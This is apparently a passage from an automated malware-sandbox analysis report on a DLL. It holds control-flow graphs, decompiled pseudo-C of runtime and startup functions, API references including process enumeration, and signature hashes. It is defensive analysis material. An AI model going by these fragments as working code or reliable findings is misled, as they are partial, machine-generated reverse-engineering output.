                                                                                                        control_flow_graph 572 180005db4-180005e1d call 180011408 575 180005e22-180005e27 572->575 576 1800060e2-1800060f3 call 18000bf58 575->576 577 180005e2d-180005e32 575->577 589 1800060f5-1800060fa 576->589 590 1800060ff 576->590 578 180006063-1800060d8 call 18001b204 577->578 579 180005e38-180005e3d 577->579 586 1800060dd Process32FirstW 578->586 582 180005e43-180005e48 579->582 583 180005f89-180006047 call 180005be0 579->583 587 180005ef5-180005f74 call 18001b898 582->587 588 180005e4e-180005e53 582->588 591 18000604c-180006053 583->591 586->576 600 180005f79-180005f84 587->600 592 180005ee6-180005ef0 588->592 593 180005e59-180005e5b 588->593 589->575 594 180006101-180006106 590->594 596 180006059-18000605e 591->596 597 180005ecd-180005ee5 591->597 592->575 593->594 598 180005e61-180005ec8 call 18000fe88 593->598 594->597 599 18000610c 594->599 596->575 598->597 599->575 600->575
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 9$>$Qz$cG$iP.
                                                                                                        • API String ID: 0-2314038544
                                                                                                        • Opcode ID: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
                                                                                                        • Instruction ID: 2738067ee2515d3e4966bb770307c21824dc71e1dd538b0d2de93925eb972619
                                                                                                        • Opcode Fuzzy Hash: 4158940623df5b63cf90af9ecb6c971ef7c92bce548850bfcd4728ba9d0de4d2
                                                                                                        • Instruction Fuzzy Hash: 57815D701497888BEBE8DF24C8C5BDA7BE1FB88344F50551DF88A8B290CB75DA44CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 635 1800248e0-1800248fd 636 180024904-180024909 635->636 637 1800250f3-1800250f8 636->637 638 18002490f 636->638 639 1800254ca-180025622 call 18002629c call 1800210bc call 180002094 637->639 640 1800250fe-180025103 637->640 641 180024f62-18002502d call 180001000 call 1800210bc 638->641 642 180024915-18002491a 638->642 663 180025627-18002562c 639->663 644 180025459-1800254c5 call 180009144 640->644 645 180025109-18002510e 640->645 670 180025032-1800250ee call 180002094 641->670 647 180024920-180024925 642->647 648 180024dce-180024eb5 call 180014fa4 call 1800210bc 642->648 644->636 653 180025114-180025119 645->653 654 1800252ad-180025379 call 18001cf30 call 1800210bc 645->654 649 180024c3b-180024d15 call 1800159a0 call 1800210bc 647->649 650 18002492b-180024930 647->650 686 180024eba-180024f5d call 180002094 648->686 689 180024d1a-180024dc9 call 180002094 649->689 657 180024ab3-180024b9b call 18001c1dc call 1800210bc 650->657 658 180024936-18002493b 650->658 653->663 664 18002511f-1800251ec call 18000b8d0 call 1800210bc 653->664 691 18002537e-180025454 call 180002094 654->691 700 180024ba0-180024c36 call 180002094 657->700 667 180024941-180024946 658->667 668 180025637-180025720 call 180008fa0 call 1800210bc 658->668 672 180025632 663->672 673 1800257ad-1800257b3 663->673 701 1800251f1-1800252a8 call 180002094 664->701 667->663 679 18002494c-180024aae call 180004ca0 call 1800210bc call 180002094 667->679 706 180025725-1800257a8 call 180002094 668->706 670->636 672->636 679->636 686->636 689->636 691->636 700->636 701->636 706->673
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Rl$X$kr$V%?
                                                                                                        • API String ID: 0-1881522904
                                                                                                        • Opcode ID: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
                                                                                                        • Instruction ID: 70c5aac2912e64376728126259cd49d2f789cf9a10fb17a3f2cb6be72cb14558
                                                                                                        • Opcode Fuzzy Hash: 98ff1e27a160c74632e307d872ef1a7f9803bcbde420e3daba4ce0dca79685d9
                                                                                                        • Instruction Fuzzy Hash: 59A2077051078D8FDB89CF24C88A5DE3BA0FB58398F52531DFC8AA6290D778D595CB88
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 715 1800038a5-1800038ad 716 1800038f3-1800038fb 715->716 717 1800038af-1800038d9 call 180015254 715->717 718 180003902-180003907 716->718 720 180003b71-180003bc4 call 180009144 718->720 721 18000390d-180003912 718->721 731 180003bc6-180003bcb 720->731 732 180003bd0 720->732 724 180003b01-180003b6c call 18001b7b0 721->724 725 180003918-18000391d 721->725 724->718 728 180003923-180003928 725->728 729 180003a56-180003afc call 180020364 725->729 733 180003bd5-180003bda 728->733 734 18000392e-1800039e8 call 180016fb4 728->734 729->718 731->718 732->733 737 180003a43-180003a55 733->737 738 180003be0 733->738 740 1800039ed-1800039f0 734->740 738->718 741 1800039f2-1800039f9 740->741 742 180003a03-180003a3e call 18001c4c0 740->742 741->742 742->737
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +s$l@-T$pN$x+MS
                                                                                                        • API String ID: 0-3074933293
                                                                                                        • Opcode ID: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
                                                                                                        • Instruction ID: e901c82c2c3415e94c79d9569d7d5064836046090d2f5b38374df02bf067750a
                                                                                                        • Opcode Fuzzy Hash: 81be9b45353ead76c9a7b6c7e167c5c32a8ae5faee5dc8465e9a6d9c4c43a028
                                                                                                        • Instruction Fuzzy Hash: A991597160074D8BEB59CF28C89A6DE3BA1FB58398F51422CFC4A97290CB78D655CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: \$m[+$m)7
                                                                                                        • API String ID: 0-1435720626
                                                                                                        • Opcode ID: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
                                                                                                        • Instruction ID: 883ce2ee539239a1f536d03f946b290b5c9bffedac0f26b385fd5492cb17272a
                                                                                                        • Opcode Fuzzy Hash: af10a5be19bd77cf0563b38453e590c7ca23ba3a925fd2c55e2086c6d71307a8
                                                                                                        • Instruction Fuzzy Hash: C002F6715083C88BEBFADF64C8897DE7BACFB54708F104619EA0A9E298DB745744CB41
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: x+MS$8
                                                                                                        • API String ID: 0-2879286383
                                                                                                        • Opcode ID: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
                                                                                                        • Instruction ID: 069f65542df350c22b25c5b11342d601f1728201a4aced1865a094658918a1cd
                                                                                                        • Opcode Fuzzy Hash: 0b36e420fc5be994054ff9bd7cd914dceaa5a559053905e74aaceefae8f335f5
                                                                                                        • Instruction Fuzzy Hash: 42413B7050074D8BEB49CF28C88A6DE3FA1FB18398F61421DFD4A96290D778D598CBC4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: '7$pr
                                                                                                        • API String ID: 0-1984906187
                                                                                                        • Opcode ID: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
                                                                                                        • Instruction ID: a51af08d5e019336a09e0604cbee0951de86a06f6bb7dc6101bcf2cec172da0b
                                                                                                        • Opcode Fuzzy Hash: 056c662d811a8c845d4963eb3dfda1ff298b6ec1510e4f1f57fedda2cc0e9922
                                                                                                        • Instruction Fuzzy Hash: A031C2B05187818BD358CFA8C48A51AFBF5BBC6344F104A1DF9C2866A0D7F5D946CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {6
                                                                                                        • API String ID: 0-1346941803
                                                                                                        • Opcode ID: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
                                                                                                        • Instruction ID: 4f9844d0cd30e9af067f9ce6bd73810c55f6bc83b648b6efbf776691940ba2a0
                                                                                                        • Opcode Fuzzy Hash: 8506dbb6b1252c503813ed30af6b5c4e6b9b4570125e6fd192f6fa1e5665ff7b
                                                                                                        • Instruction Fuzzy Hash: FA8126B09047098BDF48DFA8C4865EEBBF0FB48358F15821DE80AB7291D7789945CF98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 1
                                                                                                        • API String ID: 0-4267224553
                                                                                                        • Opcode ID: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
                                                                                                        • Instruction ID: f864b420d3f879fa0c4a6b1c1884d968131e299f1c3c71a38cb5ded6753929e5
                                                                                                        • Opcode Fuzzy Hash: 14ae2c29f1f0adff71999c81ec21c279a8b8cf5828faf7ab2494e8710ca5a4c5
                                                                                                        • Instruction Fuzzy Hash: 4881FE705087848FD779DF28C59A6DEBBF1FB89704F004A1DEA8A8B260D7769905CB42
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 311 7ffc123d4194-7ffc123d419a 312 7ffc123d41d5-7ffc123d432c 311->312 313 7ffc123d419c-7ffc123d419f 311->313 319 7ffc123d4332-7ffc123d434d call 7ffc123d3da8 312->319 320 7ffc123d432e-7ffc123d4330 312->320 314 7ffc123d41c9-7ffc123d4208 call 7ffc123d3f18 313->314 315 7ffc123d41a1-7ffc123d41a4 313->315 331 7ffc123d420a-7ffc123d420c 314->331 332 7ffc123d4211-7ffc123d4226 call 7ffc123d3da8 314->332 317 7ffc123d41a6-7ffc123d41a9 315->317 318 7ffc123d41bc __scrt_dllmain_crt_thread_attach 315->318 322 7ffc123d41ab-7ffc123d41b4 317->322 323 7ffc123d41b5-7ffc123d41ba call 7ffc123d3e58 317->323 324 7ffc123d41c1-7ffc123d41c8 318->324 334 7ffc123d4359-7ffc123d4380 call 7ffc123d3ed4 call 7ffc123d3f04 call 7ffc123d40cc call 7ffc123d40f0 319->334 335 7ffc123d434f-7ffc123d4354 call 7ffc123d4944 319->335 325 7ffc123d4382-7ffc123d4391 320->325 323->324 336 7ffc123d42f9-7ffc123d430e 331->336 343 7ffc123d4228-7ffc123d422d call 7ffc123d4944 332->343 344 7ffc123d4232-7ffc123d4243 call 7ffc123d3e18 332->344 334->325 335->334 343->344 351 7ffc123d4245-7ffc123d427a call 7ffc123d4b90 call 7ffc123d416c call 7ffc123d4b40 call 7ffc123d416c call 7ffc123d4b6c call 7ffc123da908 344->351 352 7ffc123d42ac-7ffc123d42b6 call 7ffc123d40cc 344->352 378 7ffc123d427f-7ffc123d4281 351->378 352->331 360 7ffc123d42bc-7ffc123d42c8 call 7ffc123d4b88 352->360 365 7ffc123d42ca-7ffc123d42d4 call 7ffc123d4030 360->365 366 7ffc123d42ee-7ffc123d42f4 360->366 365->366 373 7ffc123d42d6-7ffc123d42e9 call 7ffc123d4a8c 365->373 366->336 373->366 378->352 379 7ffc123d4283-7ffc123d428a __scrt_dllmain_after_initialize_c 378->379 379->352 380 7ffc123d428c-7ffc123d42a9 call 7ffc123da8c4 379->380 380->352
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123D4194(void* __edx) {
                                                                                                        				void* _t5;
                                                                                                        
                                                                                                        				_t5 = __edx;
                                                                                                        				if (_t5 == 0) goto 0x123d41d5;
                                                                                                        				if (_t5 == 0) goto 0x123d41c9;
                                                                                                        				if (_t5 == 0) goto 0x123d41bc;
                                                                                                        				if (__edx == 1) goto 0x123d41b5;
                                                                                                        				return 1;
                                                                                                        			}




                                                                                                        0x7ffc123d4198
                                                                                                        0x7ffc123d419a
                                                                                                        0x7ffc123d419f
                                                                                                        0x7ffc123d41a4
                                                                                                        0x7ffc123d41a9
                                                                                                        0x7ffc123d41b4

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_initialize_default_local_stdio_options__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                                                                        • String ID:
                                                                                                        • API String ID: 3885183344-0
                                                                                                        • Opcode ID: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction ID: 30ca035e5cc642c4374c6ff1972aeed288d943b1cd2df860b74392abf8181133
                                                                                                        • Opcode Fuzzy Hash: ec243dcbcff698803e31ef63cfb55d7716ebdb7e47eb3b9e43d512bdeea0bc95
                                                                                                        • Instruction Fuzzy Hash: F151802DE1CE6F86F610A761A4012F95298EFD5360FC440B5EA4D47697CEACE875CB20
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123D1580(long long __rcx, long long __rdx, long long _a8, void* _a16) {
                                                                                                        				char _v16;
                                                                                                        				char _v24;
                                                                                                        				long long _v32;
                                                                                                        				void* _v40;
                                                                                                        				long long _v48;
                                                                                                        				long long _v56;
                                                                                                        				void* _t41;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v32 = 0xfffffffe;
                                                                                                        				_t49 = _a16;
                                                                                                        				if (_a8 == _t49) goto 0x123d1693;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC123D1910(1, _t49, _a8, _t77); // executed
                                                                                                        				if (0 == 1) goto 0x123d160a;
                                                                                                        				E00007FFC7FFC123D1850(_a16);
                                                                                                        				_v56 = _t49;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				if ((E00007FFC7FFC123D2A50(_t49, _v56) & 0x000000ff) == 0) goto 0x123d160a;
                                                                                                        				E00007FFC7FFC123D1850(_a16);
                                                                                                        				E00007FFC7FFC123D1870(_t49, _a8, _t49);
                                                                                                        				E00007FFC7FFC123D1850(_a16);
                                                                                                        				_v48 = _t49;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				if ((E00007FFC7FFC123D2A50(_t49, _v48) & 0x000000ff) == 0) goto 0x123d167a;
                                                                                                        				E00007FFC7FFC123D1A20(_t49, _a16,  &_v24);
                                                                                                        				_v40 = _t49;
                                                                                                        				E00007FFC7FFC123D1AA0(_t49, _a16,  &_v16);
                                                                                                        				_t41 = E00007FFC7FFC123D2A90(E00007FFC7FFC123D2A50(_t49, _v48) & 0x000000ff, _t49, _a8,  *_t49,  *_v40);
                                                                                                        				goto 0x123d1693;
                                                                                                        				E00007FFC7FFC123D2B00(_t41, _a16);
                                                                                                        				return E00007FFC7FFC123D1F00(_t49, _a8, _t49);
                                                                                                        			}












                                                                                                        0x7ffc123d1580
                                                                                                        0x7ffc123d1585
                                                                                                        0x7ffc123d158e
                                                                                                        0x7ffc123d1597
                                                                                                        0x7ffc123d15a1
                                                                                                        0x7ffc123d15a7
                                                                                                        0x7ffc123d15b1
                                                                                                        0x7ffc123d15bc
                                                                                                        0x7ffc123d15c3
                                                                                                        0x7ffc123d15c9
                                                                                                        0x7ffc123d15d3
                                                                                                        0x7ffc123d15ef
                                                                                                        0x7ffc123d15f6
                                                                                                        0x7ffc123d1604
                                                                                                        0x7ffc123d160f
                                                                                                        0x7ffc123d1615
                                                                                                        0x7ffc123d161f
                                                                                                        0x7ffc123d163b
                                                                                                        0x7ffc123d1647
                                                                                                        0x7ffc123d164d
                                                                                                        0x7ffc123d165c
                                                                                                        0x7ffc123d1672
                                                                                                        0x7ffc123d1678
                                                                                                        0x7ffc123d167f
                                                                                                        0x7ffc123d169c

                                                                                                        APIs
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D15C3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D15D3
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D15F6
                                                                                                          • Part of subcall function 00007FFC123D1870: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D1883
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC123D15E4
                                                                                                          • Part of subcall function 00007FFC123D2A50: type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D2A68
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D160F
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D161F
                                                                                                        • Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 00007FFC123D1630
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Affinity::operator!=Hardware$type_info::_name_internal_method
                                                                                                        • String ID:
                                                                                                        • API String ID: 1937815552-0
                                                                                                        • Opcode ID: dc6ab4d9f45e2fc801d73a2ffc5ed4d45eff3d4dab762b5c041e478808ec6813
                                                                                                        • Instruction ID: 64cb5b57040aea9de60de9613436ceb1ef6ea229a8b7e63cf477a0f7945d374a
                                                                                                        • Opcode Fuzzy Hash: dc6ab4d9f45e2fc801d73a2ffc5ed4d45eff3d4dab762b5c041e478808ec6813
                                                                                                        • Instruction Fuzzy Hash: 6D310E3E65DE5D42DA10EB22E4514AAA365EBC57E0FC01575F9CD837AACE6CE420CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC123D2600(long long __rcx, signed int __rdx, long long __r8, long long _a8, signed int _a16, long long _a24) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _v64;
                                                                                                        				long long _v72;
                                                                                                        				long long _v80;
                                                                                                        				long long _v88;
                                                                                                        				long long _v96;
                                                                                                        				long long _v104;
                                                                                                        				char _v112;
                                                                                                        				signed long long _v120;
                                                                                                        				void* _t82;
                                                                                                        				signed long long _t111;
                                                                                                        				intOrPtr* _t113;
                                                                                                        				intOrPtr* _t114;
                                                                                                        				long long _t115;
                                                                                                        				intOrPtr* _t116;
                                                                                                        				intOrPtr* _t117;
                                                                                                        				signed long long _t118;
                                                                                                        				long long _t120;
                                                                                                        				long long* _t121;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0xfffffffe;
                                                                                                        				_t111 = _a16 | 0x0000000f;
                                                                                                        				_v120 = _t111;
                                                                                                        				E00007FFC7FFC123D2830(_t111, _a8);
                                                                                                        				if (_t111 - _v120 >= 0) goto 0x123d2659;
                                                                                                        				_v120 = _a16;
                                                                                                        				goto 0x123d2736;
                                                                                                        				_t113 = _v120;
                                                                                                        				_v104 = _t113;
                                                                                                        				E00007FFC7FFC123D2150(_t113, _a8);
                                                                                                        				_t114 =  *_t113;
                                                                                                        				if (_t114 - _v104 > 0) goto 0x123d2696;
                                                                                                        				goto 0x123d2736;
                                                                                                        				E00007FFC7FFC123D2150(_t114, _a8);
                                                                                                        				_t115 =  *_t114;
                                                                                                        				_v96 = _t115;
                                                                                                        				E00007FFC7FFC123D2830(_t115, _a8);
                                                                                                        				_t116 = _t115 - _v96;
                                                                                                        				_v88 = _t116;
                                                                                                        				E00007FFC7FFC123D2150(_t116, _a8);
                                                                                                        				if ( *_t116 - _v88 > 0) goto 0x123d2724;
                                                                                                        				E00007FFC7FFC123D2150(_t116, _a8);
                                                                                                        				_t117 =  *_t116;
                                                                                                        				_v80 = _t117;
                                                                                                        				E00007FFC7FFC123D2150(_t117, _a8);
                                                                                                        				_t118 = _v80 +  *_t117;
                                                                                                        				_v120 = _t118;
                                                                                                        				goto 0x123d2736;
                                                                                                        				E00007FFC7FFC123D2830(_t118, _a8);
                                                                                                        				_v120 = _t118;
                                                                                                        				_t120 = _v120 + 1;
                                                                                                        				_v72 = _t120;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				E00007FFC7FFC123D28E0(_t120, _v72); // executed
                                                                                                        				_v64 = _t120;
                                                                                                        				_t121 = _v64;
                                                                                                        				_v112 = _t121;
                                                                                                        				goto 0x123d2771;
                                                                                                        				if (_a24 <= 0) goto 0x123d27b0;
                                                                                                        				_t82 = E00007FFC7FFC123D18F0(_t121, _a8);
                                                                                                        				_v40 = _t121;
                                                                                                        				E00007FFC7FFC123D2C00(_t82, _v112);
                                                                                                        				E00007FFC7FFC123D11E0(_t121, _v40, _a24);
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC123D1910(1, _t121, _a8, _a24);
                                                                                                        				E00007FFC7FFC123D2BC0(E00007FFC7FFC123D2190(_a8), _t121);
                                                                                                        				_v32 = _t121;
                                                                                                        				E00007FFC7FFC123D1850(_a8);
                                                                                                        				E00007FFC7FFC123D2C10(_t121, _t121, _v32,  &_v112);
                                                                                                        				E00007FFC7FFC123D2150(_t121, _a8);
                                                                                                        				 *_t121 = _v120;
                                                                                                        				return E00007FFC7FFC123D23A0(_t121, _a8, _a24);
                                                                                                        			}
























                                                                                                        0x7ffc123d2600
                                                                                                        0x7ffc123d2605
                                                                                                        0x7ffc123d260a
                                                                                                        0x7ffc123d2616
                                                                                                        0x7ffc123d262a
                                                                                                        0x7ffc123d262e
                                                                                                        0x7ffc123d263b
                                                                                                        0x7ffc123d2645
                                                                                                        0x7ffc123d264f
                                                                                                        0x7ffc123d2654
                                                                                                        0x7ffc123d265b
                                                                                                        0x7ffc123d2668
                                                                                                        0x7ffc123d2675
                                                                                                        0x7ffc123d267c
                                                                                                        0x7ffc123d268f
                                                                                                        0x7ffc123d2691
                                                                                                        0x7ffc123d269e
                                                                                                        0x7ffc123d26a5
                                                                                                        0x7ffc123d26b0
                                                                                                        0x7ffc123d26bd
                                                                                                        0x7ffc123d26c7
                                                                                                        0x7ffc123d26ca
                                                                                                        0x7ffc123d26d7
                                                                                                        0x7ffc123d26e4
                                                                                                        0x7ffc123d26ee
                                                                                                        0x7ffc123d26f5
                                                                                                        0x7ffc123d2700
                                                                                                        0x7ffc123d270d
                                                                                                        0x7ffc123d271a
                                                                                                        0x7ffc123d271d
                                                                                                        0x7ffc123d2722
                                                                                                        0x7ffc123d272c
                                                                                                        0x7ffc123d2731
                                                                                                        0x7ffc123d273b
                                                                                                        0x7ffc123d273e
                                                                                                        0x7ffc123d274b
                                                                                                        0x7ffc123d275b
                                                                                                        0x7ffc123d2760
                                                                                                        0x7ffc123d2765
                                                                                                        0x7ffc123d276a
                                                                                                        0x7ffc123d276f
                                                                                                        0x7ffc123d277a
                                                                                                        0x7ffc123d2784
                                                                                                        0x7ffc123d2789
                                                                                                        0x7ffc123d2793
                                                                                                        0x7ffc123d27ab
                                                                                                        0x7ffc123d27b0
                                                                                                        0x7ffc123d27bd
                                                                                                        0x7ffc123d27d2
                                                                                                        0x7ffc123d27d7
                                                                                                        0x7ffc123d27e4
                                                                                                        0x7ffc123d27f9
                                                                                                        0x7ffc123d2806
                                                                                                        0x7ffc123d2810
                                                                                                        0x7ffc123d282f

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D283E
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC123D284B
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D274B
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D275B
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D2784
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D27AB
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D27E4
                                                                                                        • construct.LIBCPMTD ref: 00007FFC123D27F9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
